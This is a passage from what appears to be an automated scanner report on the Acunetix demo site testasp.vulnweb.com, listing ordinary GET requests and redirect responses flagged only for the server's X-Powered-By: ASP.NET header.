| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=24">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=25 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=25">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=26 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=26">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=27 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=27">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=28 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=28">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=29 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=29">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=3 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=3">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=30 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=30">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=31 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=31">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=32 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=32">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=33 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=33">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=34 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=34">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=35 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=35">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=36 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=36">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=37 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:45 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=37">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=38 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=38">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=39 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=39">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=4 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=4">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=40 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=40">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=5 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=5">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=6 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=6">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=7 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=7">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=8">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=9 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=9">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3615 |
| Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> 